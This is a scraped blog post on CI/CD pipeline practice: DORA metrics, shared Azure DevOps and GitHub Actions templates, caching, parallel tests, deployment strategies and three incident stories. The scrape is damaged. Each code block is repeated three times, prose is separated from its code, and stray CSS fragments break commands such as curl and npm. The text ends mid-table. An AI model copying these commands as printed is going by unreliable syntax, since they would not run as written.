Tools: Your CI/CD Pipeline is a Dumpster Fire β€” Here's the Extinguisher 🧯

Tools: Your CI/CD Pipeline is a Dumpster Fire β€” Here's the Extinguisher 🧯

🎬 Welcome to Pipeline Therapy

πŸ“Š DORA Metrics: How to Know If You're Actually Good

Here's the Uncomfortable Truth

How to Track DORA Now

πŸ—οΈ Pipeline Architecture: The Template Library Pattern

The Anti-Pattern: Every Team Reinvents the Wheel

The Solution: Shared Template Library

Azure DevOps: Template Library in Action

GitHub Actions: Reusable Workflows

⚑ Pipeline Performance: From 45 Minutes to 5

Where's the Time Going?

The Optimization Playbook

🚨 Real-World Disaster #1: The Self-Hosted Runner That Poisoned Everything

🚒 Deployment Strategies: How to Ship Without Sinking

The Deployment Strategy Menu

Canary Deployment: The Smart Way to Ship

🚨 Real-World Disaster #2: The Friday 5 PM Deployment

πŸ” Pipeline Security: Your Pipeline is an Attack Vector

Things That Should Scare You

Pipeline Security Checklist

🚨 Real-World Disaster #3: The Secret That Wasn't Secret

πŸ“ Multi-Team Governance: Herding Cats With Guardrails

🎯 Key Takeaways

πŸ”₯ Homework Let me describe your CI/CD pipeline. Stop me when I'm wrong: Let's fix all of this. Before fixing anything, you need to measure where you stand. Google's DORA research (14,000+ teams studied) identified 4 key metrics that predict software delivery performance: If your team deploys once a week, your lead time is 3 days, and your change failure rate is 30% β€” you are statistically average. Not bad, but not good either. Elite teams deploy hundreds of times per day with less than 15% failure rate. They're not smarter β€” they have better pipelines, smaller changes, and more automation. Or use tools like Sleuth, LinearB, or GitHub's built-in DORA metrics (available in GitHub Insights for Enterprise). In my experience auditing pipelines, here's where time hides: 2. Docker Layer Caching 3. Run Tests in Parallel 4. Only Test What Changed What Happened: Self-hosted build agents accumulated Docker images, node_modules caches, and build artifacts over months. Disk filled up. Builds started failing randomly across all teams. Worse: One build left behind a corrupted node_modules folder. The next build on the same agent used the cached corruption and deployed a broken application. What Happened: Team deploys at 5:07 PM on Friday (bad idea, but deadlines). Rolling update replaces all 3 pods. New version has a memory leak that manifests after 4 hours. At 9 PM, pods start OOMKilling. Nobody's monitoring. By Saturday morning, the payment service has been down for 12 hours. If they had used canary: The 5% canary pod would have shown increasing memory usage within 2 hours. Automated rollback triggers at 7 PM. 95% of users never noticed. Team enjoys their weekend. Your CI/CD pipeline has more access than most developers: What Happened: A developer added a debug step to a pipeline: GitHub/Azure DevOps masks secrets in logs... usually. But this string was partially masked because it contained special characters that broke the masking regex. The full production database password appeared in the build log. The build log was accessible to 200 developers. At the Principal level, you're not just building pipelines β€” you're building the pipeline platform that 10+ teams use. Here's how to standardize without becoming a bottleneck: Next up in the series: **Your App is on Fire and You Don't Even Know: Observability for Humans* β€” where we decode metrics, logs, traces, and why alert fatigue is slowly killing your team.* πŸ’¬ What's the longest CI/CD pipeline you've ever suffered through? I once saw a 3-hour Java build. Yes, three hours. Share your pain below. πŸ• Templates let you quickly answer FAQs or store snippets for re-use. Hide child comments as well For further actions, you may consider blocking this person and/or reporting abuse

Command

Copy

$ Metric β”‚ Elite β”‚ "We Need Help" ─────────────────────────┼────────────────┼────────────────── Deployment Frequency β”‚ Multiple/day β”‚ Monthly or less Lead Time for Changes β”‚ < 1 hour β”‚ > 1 month Change Failure Rate β”‚ 0-15% β”‚ > 45% Mean Time to Recovery β”‚ < 1 hour β”‚ > 6 months Metric β”‚ Elite β”‚ "We Need Help" ─────────────────────────┼────────────────┼────────────────── Deployment Frequency β”‚ Multiple/day β”‚ Monthly or less Lead Time for Changes β”‚ < 1 hour β”‚ > 1 month Change Failure Rate β”‚ 0-15% β”‚ > 45% Mean Time to Recovery β”‚ < 1 hour β”‚ > 6 months Metric β”‚ Elite β”‚ "We Need Help" ─────────────────────────┼────────────────┼────────────────── Deployment Frequency β”‚ Multiple/day β”‚ Monthly or less Lead Time for Changes β”‚ < 1 hour β”‚ > 1 month Change Failure Rate β”‚ 0-15% β”‚ > 45% Mean Time to Recovery β”‚ < 1 hour β”‚ > 6 months # GitHub Actions: Track deployment frequency - name: Record deployment run: | -weight: 500;">curl -X POST "${{ secrets.METRICS_ENDPOINT }}" \ -H "Content-Type: application/json" \ -d '{ "event": "deployment", "-weight: 500;">service": "${{ github.repository }}", "environment": "production", "sha": "${{ github.sha }}", "timestamp": "'$(date -u +%Y-%m-%dT%H:%M:%SZ)'" }' # GitHub Actions: Track deployment frequency - name: Record deployment run: | -weight: 500;">curl -X POST "${{ secrets.METRICS_ENDPOINT }}" \ -H "Content-Type: application/json" \ -d '{ "event": "deployment", "-weight: 500;">service": "${{ github.repository }}", "environment": "production", "sha": "${{ github.sha }}", "timestamp": "'$(date -u +%Y-%m-%dT%H:%M:%SZ)'" }' # GitHub Actions: Track deployment frequency - name: Record deployment run: | -weight: 500;">curl -X POST "${{ secrets.METRICS_ENDPOINT }}" \ -H "Content-Type: application/json" \ -d '{ "event": "deployment", "-weight: 500;">service": "${{ github.repository }}", "environment": "production", "sha": "${{ github.sha }}", "timestamp": "'$(date -u +%Y-%m-%dT%H:%M:%SZ)'" }' Team Alpha: 800-line custom YAML β†’ Azure DevOps Team Bravo: 600-line custom YAML β†’ Azure DevOps (different structure) Team Charlie: "We just deploy from our laptops" β†’ 😱 Result: β€’ 3 different security scanning approaches β€’ 2 teams forgot to add container image scanning β€’ 1 team has no tests in their pipeline β€’ Nobody can help debug another team's pipeline Team Alpha: 800-line custom YAML β†’ Azure DevOps Team Bravo: 600-line custom YAML β†’ Azure DevOps (different structure) Team Charlie: "We just deploy from our laptops" β†’ 😱 Result: β€’ 3 different security scanning approaches β€’ 2 teams forgot to add container image scanning β€’ 1 team has no tests in their pipeline β€’ Nobody can help debug another team's pipeline Team Alpha: 800-line custom YAML β†’ Azure DevOps Team Bravo: 600-line custom YAML β†’ Azure DevOps (different structure) Team Charlie: "We just deploy from our laptops" β†’ 😱 Result: β€’ 3 different security scanning approaches β€’ 2 teams forgot to add container image scanning β€’ 1 team has no tests in their pipeline β€’ Nobody can help debug another team's pipeline β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ Shared Template Library (v2.5.0) β”‚ β”‚ β”‚ β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ β”‚ β”‚ Build β”‚ β”‚ Test β”‚ β”‚ Security β”‚ β”‚ β”‚ β”‚ Template β”‚ β”‚ Template β”‚ β”‚ Scan β”‚ β”‚ β”‚ β”‚ (.NET, β”‚ β”‚ (unit, β”‚ β”‚ Template β”‚ β”‚ β”‚ β”‚ Node, β”‚ β”‚ integ, β”‚ β”‚ (Trivy, β”‚ β”‚ β”‚ β”‚ Python) β”‚ β”‚ e2e) β”‚ β”‚ Checkov) β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ β”‚ β”‚ Deploy β”‚ β”‚ Notify β”‚ β”‚ Rollback β”‚ β”‚ β”‚ β”‚ Template β”‚ β”‚ Template β”‚ β”‚ Template β”‚ β”‚ β”‚ β”‚ (K8s, β”‚ β”‚ (Slack, β”‚ β”‚ (auto/ β”‚ β”‚ β”‚ β”‚ AppSvc) β”‚ β”‚ Teams) β”‚ β”‚ manual) β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ consumed by β–Ό β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ Team pipelines (10-20 lines each!) β”‚ β”‚ "Use build template, test template, deploy β”‚ β”‚ template β€” just tell it your -weight: 500;">service name" β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ Shared Template Library (v2.5.0) β”‚ β”‚ β”‚ β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ β”‚ β”‚ Build β”‚ β”‚ Test β”‚ β”‚ Security β”‚ β”‚ β”‚ β”‚ Template β”‚ β”‚ Template β”‚ β”‚ Scan β”‚ β”‚ β”‚ β”‚ (.NET, β”‚ β”‚ (unit, β”‚ β”‚ Template β”‚ β”‚ β”‚ β”‚ Node, β”‚ β”‚ integ, β”‚ β”‚ (Trivy, β”‚ β”‚ β”‚ β”‚ Python) β”‚ β”‚ e2e) β”‚ β”‚ Checkov) β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ β”‚ β”‚ Deploy β”‚ β”‚ Notify β”‚ β”‚ Rollback β”‚ β”‚ β”‚ β”‚ Template β”‚ β”‚ Template β”‚ β”‚ Template β”‚ β”‚ β”‚ β”‚ (K8s, β”‚ β”‚ (Slack, β”‚ β”‚ (auto/ β”‚ β”‚ β”‚ β”‚ AppSvc) β”‚ β”‚ Teams) β”‚ β”‚ manual) β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ consumed by β–Ό β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ Team pipelines (10-20 lines each!) β”‚ β”‚ "Use build template, test template, deploy β”‚ β”‚ template β€” just tell it your -weight: 500;">service name" β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ Shared Template Library (v2.5.0) β”‚ β”‚ β”‚ β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ β”‚ β”‚ Build β”‚ β”‚ Test β”‚ β”‚ Security β”‚ β”‚ β”‚ β”‚ Template β”‚ β”‚ Template β”‚ β”‚ Scan β”‚ β”‚ β”‚ β”‚ (.NET, β”‚ β”‚ (unit, β”‚ β”‚ Template β”‚ β”‚ β”‚ β”‚ Node, β”‚ β”‚ integ, β”‚ β”‚ (Trivy, β”‚ β”‚ β”‚ β”‚ Python) β”‚ β”‚ e2e) β”‚ β”‚ Checkov) β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ β”‚ β”‚ Deploy β”‚ β”‚ Notify β”‚ β”‚ Rollback β”‚ β”‚ β”‚ β”‚ Template β”‚ β”‚ Template β”‚ β”‚ Template β”‚ β”‚ β”‚ β”‚ (K8s, β”‚ β”‚ (Slack, β”‚ β”‚ (auto/ β”‚ β”‚ β”‚ β”‚ AppSvc) β”‚ β”‚ Teams) β”‚ β”‚ manual) β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ consumed by β–Ό β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ Team pipelines (10-20 lines each!) β”‚ β”‚ "Use build template, test template, deploy β”‚ β”‚ template β€” just tell it your -weight: 500;">service name" β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ # Team's pipeline: SHORT and STANDARD trigger: branches: include: [main] resources: repositories: - repository: templates type: -weight: 500;">git name: platform/pipeline-templates ref: refs/tags/v2.5.0 # πŸ”‘ Always pin the version! stages: - template: stages/ci.yml@templates parameters: language: dotnet dotnetVersion: '8.0' testProjects: '**/*Tests.csproj' - template: stages/security-scan.yml@templates parameters: trivySeverity: 'CRITICAL,HIGH' - template: stages/deploy-k8s.yml@templates parameters: environment: staging aksCluster: aks-staging-eastus namespace: payments - template: stages/deploy-k8s.yml@templates parameters: environment: production aksCluster: aks-prod-eastus namespace: payments requireApproval: true # Team's pipeline: SHORT and STANDARD trigger: branches: include: [main] resources: repositories: - repository: templates type: -weight: 500;">git name: platform/pipeline-templates ref: refs/tags/v2.5.0 # πŸ”‘ Always pin the version! stages: - template: stages/ci.yml@templates parameters: language: dotnet dotnetVersion: '8.0' testProjects: '**/*Tests.csproj' - template: stages/security-scan.yml@templates parameters: trivySeverity: 'CRITICAL,HIGH' - template: stages/deploy-k8s.yml@templates parameters: environment: staging aksCluster: aks-staging-eastus namespace: payments - template: stages/deploy-k8s.yml@templates parameters: environment: production aksCluster: aks-prod-eastus namespace: payments requireApproval: true # Team's pipeline: SHORT and STANDARD trigger: branches: include: [main] resources: repositories: - repository: templates type: -weight: 500;">git name: platform/pipeline-templates ref: refs/tags/v2.5.0 # πŸ”‘ Always pin the version! stages: - template: stages/ci.yml@templates parameters: language: dotnet dotnetVersion: '8.0' testProjects: '**/*Tests.csproj' - template: stages/security-scan.yml@templates parameters: trivySeverity: 'CRITICAL,HIGH' - template: stages/deploy-k8s.yml@templates parameters: environment: staging aksCluster: aks-staging-eastus namespace: payments - template: stages/deploy-k8s.yml@templates parameters: environment: production aksCluster: aks-prod-eastus namespace: payments requireApproval: true # .github/workflows/deploy.yml β€” Team's workflow name: Deploy on: push: branches: [main] jobs: build-and-test: uses: myorg/shared-workflows/.github/workflows/build-dotnet[email protected] with: dotnet-version: '8.0' project-path: 'src/PaymentService' security-scan: needs: build-and-test uses: myorg/shared-workflows/.github/workflows/security-scan[email protected] with: image: ${{ needs.build-and-test.outputs.image }} deploy: needs: [build-and-test, security-scan] uses: myorg/shared-workflows/.github/workflows/deploy-k8s[email protected] with: environment: production image: ${{ needs.build-and-test.outputs.image }} secrets: inherit # .github/workflows/deploy.yml β€” Team's workflow name: Deploy on: push: branches: [main] jobs: build-and-test: uses: myorg/shared-workflows/.github/workflows/build-dotnet[email protected] with: dotnet-version: '8.0' project-path: 'src/PaymentService' security-scan: needs: build-and-test uses: myorg/shared-workflows/.github/workflows/security-scan[email protected] with: image: ${{ needs.build-and-test.outputs.image }} deploy: needs: [build-and-test, security-scan] uses: myorg/shared-workflows/.github/workflows/deploy-k8s[email protected] with: environment: production image: ${{ needs.build-and-test.outputs.image }} secrets: inherit # .github/workflows/deploy.yml β€” Team's workflow name: Deploy on: push: branches: [main] jobs: build-and-test: uses: myorg/shared-workflows/.github/workflows/build-dotnet[email protected] with: dotnet-version: '8.0' project-path: 'src/PaymentService' security-scan: needs: build-and-test uses: myorg/shared-workflows/.github/workflows/security-scan[email protected] with: image: ${{ needs.build-and-test.outputs.image }} deploy: needs: [build-and-test, security-scan] uses: myorg/shared-workflows/.github/workflows/deploy-k8s[email protected] with: environment: production image: ${{ needs.build-and-test.outputs.image }} secrets: inherit Typical 45-minute pipeline breakdown: ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 7 min β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚ Agent startup + checkout 12 min β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚ Dependency -weight: 500;">install (-weight: 500;">npm/nuget) 5 min β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚ Build 8 min β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚ Tests (running ALL tests sequentially) 3 min β”‚β–ˆβ–ˆβ–ˆβ”‚ Docker build (no layer caching) 5 min β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚ Security scanning 5 min β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚ Deploy + smoke tests ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 45 min total πŸ’€ Optimized 5-minute pipeline: ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 0.5 min β”‚β–ˆβ”‚ Cached checkout 0.5 min β”‚β–ˆβ”‚ Cached dependencies 1 min β”‚β–ˆβ–ˆβ”‚ Incremental build 1 min β”‚β–ˆβ–ˆβ”‚ Parallel tests (affected only) 0.5 min β”‚β–ˆβ”‚ Docker build (cached layers) 1 min β”‚β–ˆβ–ˆβ”‚ Parallel: scan + deploy 0.5 min β”‚β–ˆβ”‚ Smoke test ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 5 min total πŸš€ Typical 45-minute pipeline breakdown: ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 7 min β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚ Agent startup + checkout 12 min β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚ Dependency -weight: 500;">install (-weight: 500;">npm/nuget) 5 min β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚ Build 8 min β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚ Tests (running ALL tests sequentially) 3 min β”‚β–ˆβ–ˆβ–ˆβ”‚ Docker build (no layer caching) 5 min β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚ Security scanning 5 min β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚ Deploy + smoke tests ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 45 min total πŸ’€ Optimized 5-minute pipeline: ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 0.5 min β”‚β–ˆβ”‚ Cached checkout 0.5 min β”‚β–ˆβ”‚ Cached dependencies 1 min β”‚β–ˆβ–ˆβ”‚ Incremental build 1 min β”‚β–ˆβ–ˆβ”‚ Parallel tests (affected only) 0.5 min β”‚β–ˆβ”‚ Docker build (cached layers) 1 min β”‚β–ˆβ–ˆβ”‚ Parallel: scan + deploy 0.5 min β”‚β–ˆβ”‚ Smoke test ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 5 min total πŸš€ Typical 45-minute pipeline breakdown: ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 7 min β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚ Agent startup + checkout 12 min β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚ Dependency -weight: 500;">install (-weight: 500;">npm/nuget) 5 min β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚ Build 8 min β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚ Tests (running ALL tests sequentially) 3 min β”‚β–ˆβ–ˆβ–ˆβ”‚ Docker build (no layer caching) 5 min β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚ Security scanning 5 min β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚ Deploy + smoke tests ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 45 min total πŸ’€ Optimized 5-minute pipeline: ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 0.5 min β”‚β–ˆβ”‚ Cached checkout 0.5 min β”‚β–ˆβ”‚ Cached dependencies 1 min β”‚β–ˆβ–ˆβ”‚ Incremental build 1 min β”‚β–ˆβ–ˆβ”‚ Parallel tests (affected only) 0.5 min β”‚β–ˆβ”‚ Docker build (cached layers) 1 min β”‚β–ˆβ–ˆβ”‚ Parallel: scan + deploy 0.5 min β”‚β–ˆβ”‚ Smoke test ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 5 min total πŸš€ # GitHub Actions: Cache node_modules - uses: actions/cache@v4 with: path: ~/.-weight: 500;">npm key: -weight: 500;">npm-${{ hashFiles('**/package-lock.json') }} restore-keys: -weight: 500;">npm- # Azure DevOps: Cache NuGet packages - task: Cache@2 inputs: key: 'nuget | "$(Agent.OS)" | **/packages.lock.json' restoreKeys: 'nuget | "$(Agent.OS)"' path: $(NUGET_PACKAGES) # GitHub Actions: Cache node_modules - uses: actions/cache@v4 with: path: ~/.-weight: 500;">npm key: -weight: 500;">npm-${{ hashFiles('**/package-lock.json') }} restore-keys: -weight: 500;">npm- # Azure DevOps: Cache NuGet packages - task: Cache@2 inputs: key: 'nuget | "$(Agent.OS)" | **/packages.lock.json' restoreKeys: 'nuget | "$(Agent.OS)"' path: $(NUGET_PACKAGES) # GitHub Actions: Cache node_modules - uses: actions/cache@v4 with: path: ~/.-weight: 500;">npm key: -weight: 500;">npm-${{ hashFiles('**/package-lock.json') }} restore-keys: -weight: 500;">npm- # Azure DevOps: Cache NuGet packages - task: Cache@2 inputs: key: 'nuget | "$(Agent.OS)" | **/packages.lock.json' restoreKeys: 'nuget | "$(Agent.OS)"' path: $(NUGET_PACKAGES) # BAD: Copying everything first breaks the cache COPY . . RUN -weight: 500;">npm -weight: 500;">install # GOOD: Copy package files first, -weight: 500;">install, THEN copy code COPY package.json package-lock.json ./ RUN -weight: 500;">npm ci --production COPY . . # Now code changes don't re-trigger -weight: 500;">npm -weight: 500;">install # BAD: Copying everything first breaks the cache COPY . . RUN -weight: 500;">npm -weight: 500;">install # GOOD: Copy package files first, -weight: 500;">install, THEN copy code COPY package.json package-lock.json ./ RUN -weight: 500;">npm ci --production COPY . . # Now code changes don't re-trigger -weight: 500;">npm -weight: 500;">install # BAD: Copying everything first breaks the cache COPY . . RUN -weight: 500;">npm -weight: 500;">install # GOOD: Copy package files first, -weight: 500;">install, THEN copy code COPY package.json package-lock.json ./ RUN -weight: 500;">npm ci --production COPY . . # Now code changes don't re-trigger -weight: 500;">npm -weight: 500;">install # GitHub Actions: Matrix strategy jobs: test: strategy: matrix: shard: [1, 2, 3, 4] steps: - run: -weight: 500;">npm test -- --shard=${{ matrix.shard }}/4 # GitHub Actions: Matrix strategy jobs: test: strategy: matrix: shard: [1, 2, 3, 4] steps: - run: -weight: 500;">npm test -- --shard=${{ matrix.shard }}/4 # GitHub Actions: Matrix strategy jobs: test: strategy: matrix: shard: [1, 2, 3, 4] steps: - run: -weight: 500;">npm test -- --shard=${{ matrix.shard }}/4 # For monorepos: detect which -weight: 500;">service changed - uses: dorny/paths-filter@v3 id: changes with: filters: | payments: - 'services/payments/**' users: - 'services/users/**' - name: Test payments if: steps.changes.outputs.payments == 'true' run: cd services/payments && -weight: 500;">npm test # For monorepos: detect which -weight: 500;">service changed - uses: dorny/paths-filter@v3 id: changes with: filters: | payments: - 'services/payments/**' users: - 'services/users/**' - name: Test payments if: steps.changes.outputs.payments == 'true' run: cd services/payments && -weight: 500;">npm test # For monorepos: detect which -weight: 500;">service changed - uses: dorny/paths-filter@v3 id: changes with: filters: | payments: - 'services/payments/**' users: - 'services/users/**' - name: Test payments if: steps.changes.outputs.payments == 'true' run: cd services/payments && -weight: 500;">npm test ERROR: -weight: 500;">npm ERR! ENOSPC: no space left on device ERROR: -weight: 500;">npm ERR! ENOSPC: no space left on device ERROR: -weight: 500;">npm ERR! ENOSPC: no space left on device - name: Agent cleanup condition: always() run: | -weight: 500;">docker system prune -af --volumes rm -rf /tmp/build-* - name: Agent cleanup condition: always() run: | -weight: 500;">docker system prune -af --volumes rm -rf /tmp/build-* - name: Agent cleanup condition: always() run: | -weight: 500;">docker system prune -af --volumes rm -rf /tmp/build-* Strategy β”‚ Risk β”‚ Speed β”‚ Rollback β”‚ Best For ───────────────────┼───────┼───────┼──────────┼────────────────── Rolling Update β”‚ Med β”‚ Fast β”‚ Slow β”‚ Default K8s strategy Blue-Green β”‚ Low β”‚ Fast β”‚ Instant β”‚ Stateless services Canary β”‚ Low β”‚ Slow β”‚ Fast β”‚ High-risk changes Feature Flags β”‚ Lowestβ”‚ Inst. β”‚ Instant β”‚ Business logic changes Strategy β”‚ Risk β”‚ Speed β”‚ Rollback β”‚ Best For ───────────────────┼───────┼───────┼──────────┼────────────────── Rolling Update β”‚ Med β”‚ Fast β”‚ Slow β”‚ Default K8s strategy Blue-Green β”‚ Low β”‚ Fast β”‚ Instant β”‚ Stateless services Canary β”‚ Low β”‚ Slow β”‚ Fast β”‚ High-risk changes Feature Flags β”‚ Lowestβ”‚ Inst. β”‚ Instant β”‚ Business logic changes Strategy 